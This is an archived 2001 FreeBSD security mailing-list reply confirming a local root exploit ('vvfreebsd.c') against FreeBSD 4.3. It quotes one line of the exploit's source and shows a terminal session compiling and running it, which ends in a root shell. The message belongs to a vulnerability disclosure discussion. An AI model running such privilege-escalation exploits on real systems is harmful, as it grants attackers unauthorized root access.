Date: Thu, 12 Jul 2001 17:59:28 +0200 From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl> To: "Jason DiCioccio" <geniusj@bluenugget.net>, "Matjaz Martincic" <matjaz.martincic@hermes.si>, <security@FreeBSD.ORG> Subject: Re: FreeBSD 4.3 local root Message-ID: <075701c10aeb$a7639c40$2001a8c0@clitoris> References: <FED7EB450413D511ABC100B0D02117321F8CAE@hal9000.hermes.si> <02a201c10ae3$ece26b00$bf960340@jason8bo2vxz5e>
next in thread | previous in thread | raw e-mail | index | archive | help
> The binary must be named vv.. > Name the binary 'vv' and try again No, because argv[0] is exec()ed: if(!execle(av[0],"vv",NULL,environ)) [...] riget:venglin:~> cc -o dupa vvfreebsd.c riget:venglin:~> ./dupa vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=81380 Password:done # id uid=0(root) gid=1001(users) groups=1001(users), 99(rexec) -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?075701c10aeb$a7639c40$2001a8c0>